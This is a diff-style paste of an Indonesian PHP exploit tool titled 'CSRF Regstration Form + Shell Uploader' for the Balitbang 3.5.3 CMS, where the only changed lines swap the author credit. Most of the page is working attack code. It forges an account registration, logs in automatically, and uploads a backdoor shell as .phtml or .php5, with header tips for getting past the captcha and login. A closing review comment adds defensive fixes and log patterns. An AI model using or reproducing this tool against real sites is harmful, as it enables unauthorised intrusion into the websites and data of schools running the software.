1 | <html> | |
2 | <!--- | |
3 | - | // script ini dibuat berdasarkan iseng saja... :) |
3 | + | // { Attacker Alone Cyber } |
4 | - | // by. kitasemua |
4 | + | // by. MR.V4N |
5 | // -------------------------- | |
6 | // Simpan script ini dengan nama: test.php | |
7 | // - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php" | |
8 | // - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya | |
9 | // - Format shell: *.phtml, *.php5 | |
10 | // -------------------------- | |
11 | // Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php | |
12 | // Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php | |
13 | // -------------------------- | |
14 | // Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS". | |
15 | // -------------------------- | |
16 | --> | |
17 | <head> | |
18 | <title>Balitbang 3.5.3</title> | |
19 | </head> | |
20 | <style type="text/css"> | |
21 | input[type=text],input[type=code],input[type=password]{ | |
22 | border:1px solid #c0c0c0; | |
23 | height:24px; | |
24 | padding:5px; | |
25 | } | |
26 | </style> | |
27 | <body> | |
28 | <?php | |
29 | function hex($str='',$code='') { | |
30 | if(($code>=0)and($code<100)) { | |
31 | $t .=dechex(strlen($str)+$code)."g"; | |
32 | $str=strrev($str); | |
33 | for($i=0;$i<=strlen($str)-1;$i++) { | |
34 | $t .=dechex(ord(substr($str,$i,1))+$code); | |
35 | } | |
36 | } | |
37 | return $t; | |
38 | } | |
39 | function unhex($str='',$code='') { | |
40 | $all=explode("g",$str); | |
41 | $head=hexdec($all[0])-$code; | |
42 | $content=$all[1]; | |
43 | if($head==(strlen($content)/2)) { | |
44 | for($i=0;$i<=$head-1;$i++) { | |
45 | $t .=chr(hexdec(substr($content,$i*2,2))-$code); | |
46 | } | |
47 | $t =strrev($t); | |
48 | } | |
49 | return $t; | |
50 | } | |
51 | $target = $_GET['target']; | |
52 | $ur_target = $target."/member/membersave.php"; | |
53 | $ur_upload = $target."/functions/simmateri.php"; | |
54 | $captcha = $target."/functions/captcha/captcha.php"; | |
55 | $ur_login = $target."/member/ajax_login.php"; | |
56 | $userx = $_GET['n']; | |
57 | $passx = $_GET['p']; | |
58 | if(isset($_POST['next'])){ | |
59 | $tar = $_POST['tar']; | |
60 | $n = $_POST['n']; | |
61 | $p = $_POST['p']; | |
62 | header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar.""); | |
63 | } | |
64 | echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>"; | |
65 | ?> | |
66 | <form method="post" action="" enctype="multipart/form-data"> | |
67 | <table id=tablebaru cellspacing='1' cellpadding='3'> | |
68 | <tr> | |
69 | <td>target</td> | |
70 | <td>:</td> | |
71 | <td><input type="text" name="tar" size="61" placeholder='http://'/></td> | |
72 | </tr> | |
73 | <tr> | |
74 | <td>username</td> | |
75 | <td>:</td> | |
76 | <td><input type="text" name="n" size="61"/></td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td>password</td> | |
80 | <td>:</td> | |
81 | <td><input type="text" name="p" size="61"/></td> | |
82 | </tr> | |
83 | <tr> | |
84 | <td></td> | |
85 | <td></td> | |
86 | <td><input type="submit" name="next" value="NEXT »"/></td> | |
87 | </tr> | |
88 | </table> | |
89 | </form> | |
90 | <hr> | |
91 | <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){ | |
92 | $asli = hex($userx,"82"); | |
93 | $pass = hex($passx,"82"); | |
94 | echo "username : <b>$userx</b><br>"; | |
95 | echo "password : <b>$passx</b><hr>"; | |
96 | ?> | |
97 | <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'> | |
98 | <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'> | |
99 | <input type=hidden name='name' value='ganteng'/> | |
100 | <input type=hidden name='username' value='<?php echo $userx;?>'/> | |
101 | <input type=hidden name='password' value='<?php echo $passx;?>'/> | |
102 | <input type=hidden name='email' value='abc@abc.abc'/> | |
103 | <input type=hidden name='kelamin' value='m'/> | |
104 | <input type=hidden name='jenis' value='Tamu'> | |
105 | <input type=hidden name='kelas' value=''/> | |
106 | <input type=hidden name='hari' value='01'/> | |
107 | <input type=hidden name='bulan' value='01'/> | |
108 | <input type=hidden name='tahun' value='1995'/> | |
109 | <input type=hidden name='nis' value=''/> | |
110 | <input type=hidden name='pertanyaan' value='1'/> | |
111 | <input type=hidden name='jawaban' value='1'/> | |
112 | <input type=hidden name='kerja' value='Guru'/> | |
113 | <input type=hidden name='alamat' value='jauh'/> | |
114 | <input type=hidden name='sekolah' value='terserah'/> | |
115 | <input type=hidden name='telp' value='0'/> | |
116 | <input type=hidden name='blog' value=''/> | |
117 | <input type=hidden name='tentang' value='terserah'/> | |
118 | <input type=hidden name='country' value='INDONESIA'/> | |
119 | <input type=hidden name='stprofil' value='open'/> | |
120 | <input type=hidden name='stblog' value='on'/> | |
121 | <table> | |
122 | <tr> | |
123 | <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td> | |
124 | <td rowspan="2" valign="top"><i>» capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td> | |
125 | </tr> | |
126 | <tr> | |
127 | <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td> | |
128 | <td valign="top"><input type=submit name='submit' value='GO »'/></td> | |
129 | </tr> | |
130 | </table> | |
131 | </form> | |
132 | <?php | |
133 | echo "<!-- | |
134 | ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass." | |
135 | --> | |
136 | "; | |
137 | echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!. | |
138 | <br><i>» capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>"; | |
139 | } else if(isset($_GET['load']) && $_GET['load'] == "upload"){ | |
140 | ?> | |
141 | <script type="text/javascript"> | |
142 | window.onload = function(){ | |
143 | document.forms['login_form'].submit() | |
144 | ||
145 | } | |
146 | function setURL(url){ | |
147 | document.getElementById('verif').src = url; | |
148 | } | |
149 | </script> | |
150 | <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'> | |
151 | <input type='hidden' name='user_name' value="<?php echo $userx;?>"/> | |
152 | <input type='hidden' name='password' value="<?php echo $passx;?>"/> | |
153 | Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/> | |
154 | </form> | |
155 | <div style='margin-top:-20px;'> | |
156 | <iframe name='autologin' width='30' height='30' style="border:0;"></iframe> | |
157 | </div> | |
158 | <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'> | |
159 | <input type='hidden' name='pesan' value='abcabcabc'/></td> | |
160 | <table cellspacing='1' cellpadding='3'> | |
161 | <tr> | |
162 | <td valign='top'>File</td> | |
163 | <td valign='top'>:</td> | |
164 | <td valign='top'><input type='file' name='file'></td> | |
165 | <td valign='top' align='right'><input type='submit' value=' Simpan '/></td> | |
166 | </tr> | |
167 | <tr> | |
168 | <td valign='top' colspan="4"><i>» capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td> | |
169 | </tr> | |
170 | <tr> | |
171 | <td valign='top' colspan="4"> | |
172 | hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br> | |
173 | hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td> | |
174 | </tr> | |
175 | </table> | |
176 | <input type=hidden name='st' value='ganteng'> | |
177 | <input type=hidden name='nis' value=''> | |
178 | <input type=hidden name='idtugas' value=''> | |
179 | </form> | |
180 | <hr> | |
181 | <?php } ?> | |
182 | </body> | |
183 | </html> |
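Review bot: The header comment is the only place this paste documents the flaw, and the two changed lines only swap the author credit, leaving that documentation incomplete. Paste line 11 misspells the path as `/functons/simmateri.php`, while the code on paste line 53 uses `/functions/simmateri.php`. The remediation on paste line 12 should be spelled out for anyone maintaining a Balitbang 3.5.3 site, for example `// Fix: allowlist upload extensions in /functions/simmateri.php and /functions/simmateriguru.php, and disable PHP execution under /tugas/`. An allowlist matters because a filter that blocks only `.php` would still accept the `*.phtml` and `*.php5` formats named on paste line 9. For log review, the pattern visible on this page is a POST to either upload handler followed by requests for `/tugas/tgs-*.phtml` or `/tugas/tgs-*.php5`. The cross-site post to `/member/membersave.php` also suggests that endpoint checks no anti-CSRF token or origin, which is inferred from this page and should be confirmed in the application.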